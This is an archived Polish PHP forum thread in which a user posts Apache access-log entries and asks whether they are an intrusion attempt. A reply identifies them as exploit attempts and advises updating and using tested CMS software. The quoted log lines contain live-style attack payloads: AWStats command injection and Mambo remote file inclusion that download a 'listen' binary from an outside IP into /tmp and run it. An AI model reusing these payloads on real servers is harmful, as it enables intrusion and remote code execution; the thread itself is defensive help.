Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Dziwny Log
Forum PHP.pl > Forum > Serwery WWW > Apache
XhtmlProject
21.12.2005, 02:34:04
Witajcie. Chciałem zapytać co oznaczają poniższe wpisy z log'a Apache'a:

Cytat
217.174.252.237 - - [20/Dec/2005:21:55:55 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 403 220
217.174.252.237 - - [20/Dec/2005:21:55:56 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 216
217.174.252.237 - - [20/Dec/2005:21:55:58 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 224
217.174.252.237 - - [20/Dec/2005:21:55:59 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 403 212
217.174.252.237 - - [20/Dec/2005:21:56:00 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 403 211
217.174.252.237 - - [20/Dec/2005:21:56:01 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 403 218
217.174.252.237 - - [20/Dec/2005:21:56:02 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 403 216
217.174.252.237 - - [20/Dec/2005:21:56:03 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 403 222
213.134.160.9 - - [20/Dec/2005:23:03:08 +0100] "GET / HTTP/1.0" 403 202


Jeśli była to próba dostępu chciałbym wiedzieć jak mogę się przed nią bronić.
Mam zainstalowanego Apache 2.0.54 + PHP5 +MySQL4 na WinXP, przy czym w konfigu Apache'a zmieniłem dla bezpieczeństwa następujące dyrektywy:


UseCanonicalName Off
ServerSignature Off
HostnameLookups Off
ServerTokens Prod

Dodatkowo wszędzie powyłączałem opcje AllowOverride aby działały pliki .htaccess

Jeszcze jedno pytanie:
Jak powinienem skonfigurować Apache'a abym spał spokojnie.
Radarek
26.12.2005, 19:43:20
Sa to proby wykorzystania luk w oprogramowaniu. Zabezpieczenie apache nie ma tu nic do gadania. Albo ktos szukal jakis luk, albo je zna i chcial je wykorzystac. Jesli wszystko dziala na serwerze tak jak dzialalo to zapewne atak sie nie udal. Jak sie bronic? Uzywac przetestowanych skryptow/cmsow, pisac bezpieczne skrypty smile.gif.
XhtmlProject
26.12.2005, 21:57:23
Cytat(Radarek @ 2005-12-26 19:43:20)
Sa to proby wykorzystania luk w oprogramowaniu. Zabezpieczenie apache nie ma tu nic do gadania. Albo ktos szukal jakis luk, albo je zna i chcial je wykorzystac. Jesli wszystko dziala na serwerze tak jak dzialalo to zapewne atak sie nie udal. Jak sie bronic? Uzywac przetestowanych skryptow/cmsow, pisac bezpieczne skrypty smile.gif.

Czy takie (udane) proby moga pozwolic osobie ktora je przeprowadza na przegladanie zasobow dysku twardego ? blink.gif
Radarek
26.12.2005, 22:14:27
Hm jesli dziura umozliwia takie dzialanie to mozliwe jest wszystko na co pozwala ta dziura :-). Nie powiem ci jak jest w twoim przypadku, bo nie wiem co tam uzywasz (choc widze zdaje sie cms mambo). Sa dziury dzieki ktorym mozna skasowac cala baze, przegladac pliki na serwerze i wiele wiele innych rzeczy :-). Generalnie trzeba czesto aktualizowac uzywane oprogramowanie. Sprawdz czy sa dostepne nowsze wersje oprogramowania ktorego uzywasz (mowie tu o php a nie np o linuxie). Jesli takie wpisy nie beda sie powtarzac to zapewne koles dal sobie siana :-). A tak przy okazji to jak zauwazyles te wpisy? Twoje hobby to przegladanie logow serwera www?smile.gif
XhtmlProject
28.12.2005, 01:09:41
Cytat(Radarek @ 2005-12-26 22:14:27)
A tak przy okazji to jak zauwazyles te wpisy? Twoje hobby to przegladanie logow serwera www?smile.gif

Zgadza się - świata po za tym nie widzę winksmiley.jpg

Btw. -> THX za info.

Pozdrawiam.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.